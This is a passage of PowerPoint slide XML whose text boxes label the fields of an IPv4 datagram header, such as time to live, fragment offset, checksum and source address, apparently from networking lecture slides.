          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>ver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22535" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7593013" y="2543175"/>
            <a:ext cx="1082675" cy="531813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>length</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22536" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4081463" y="3098800"/>
            <a:ext cx="5613400" cy="6350"/>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37" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6840538" y="2376488"/>
            <a:ext cx="0" cy="719137"/>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38" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6216650" y="1628775"/>
            <a:ext cx="1168400" cy="531813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>32 bits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22539" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7613650" y="1971675"/>
            <a:ext cx="2028825" cy="6350"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22540" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4046538" y="1987550"/>
            <a:ext cx="1906587" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22541" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5584825" y="6564313"/>
            <a:ext cx="2836863" cy="1854200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>(variable length,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>typically a TCP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>or UDP segment)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22542" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3948113" y="3232150"/>
            <a:ext cx="3062287" cy="530225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>16-bit identifier</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22543" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4073525" y="5229225"/>
            <a:ext cx="5619750" cy="0"/>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44" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4073525" y="5907088"/>
            <a:ext cx="5619750" cy="0"/>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45" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7478713" y="3756025"/>
            <a:ext cx="1685925" cy="930275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t> checksum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22546" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4119563" y="3714750"/>
            <a:ext cx="1252537" cy="931863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>time to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>live</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2600">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22547" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5075238" y="4681538"/>
            <a:ext cx="3500437" cy="530225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>32 bit source IP address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22548" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3378200" y="1614488"/>
            <a:ext cx="261938" cy="347662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22549" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1141413" y="1450975"/>
            <a:ext cx="2487612" cy="931863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>header length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t> (4-byte words)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22550" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="296863" y="4267200"/>
            <a:ext cx="2508250" cy="1730375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>max number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>remaining hops</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>(decremented at </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>each router)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22551" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10309225" y="2800350"/>
            <a:ext cx="2236788" cy="1331913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>fragmentation/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>reassembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22552" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10239375" y="1757363"/>
            <a:ext cx="2216150" cy="931862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>total datagram</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>length (bytes)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22553" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="739775" y="6307138"/>
            <a:ext cx="3057525" cy="931862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>upper layer protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>to deliver payload to</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22554" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3797300" y="4137025"/>
            <a:ext cx="1984375" cy="2427288"/>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55" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4659313" y="2305050"/>
            <a:ext cx="974725" cy="931863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>head.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>len</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22556" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5599113" y="2292350"/>
            <a:ext cx="1230312" cy="931863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>type of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22557" name="Line 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5567363" y="2368550"/>
            <a:ext cx="0" cy="720725"/>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58" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4694238" y="2382838"/>
            <a:ext cx="0" cy="719137"/>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59" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1409700" y="3562350"/>
            <a:ext cx="2149475" cy="530225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2600"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2600"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2600"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2600"/>
              <a:t> of data </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22560" name="Line 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6840538" y="3106738"/>
            <a:ext cx="0" cy="720725"/>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61" name="Text Box 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="3217863"/>
            <a:ext cx="1096962" cy="531812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>flgs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22562" name="Line 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7504113" y="3094038"/>
            <a:ext cx="0" cy="719137"/>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63" name="Text Box 38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7566025" y="3028950"/>
            <a:ext cx="2032000" cy="930275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t>fragment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2600"/>
              <a:t> offset</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22564" name="Line 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4073525" y="3821113"/>
            <a:ext cx="5619750" cy="0"/>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65" name="Line 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6840538" y="3825875"/>
            <a:ext cx="0" cy="719138"/>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66" name="Line 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4046538" y="4552950"/>
            <a:ext cx="5619750" cy="0"/>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67" name="Text Box 44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5637213" y="3700463"/>
            <a:ext cx="1055687" cy="931862"/>
          </a:xfrm>
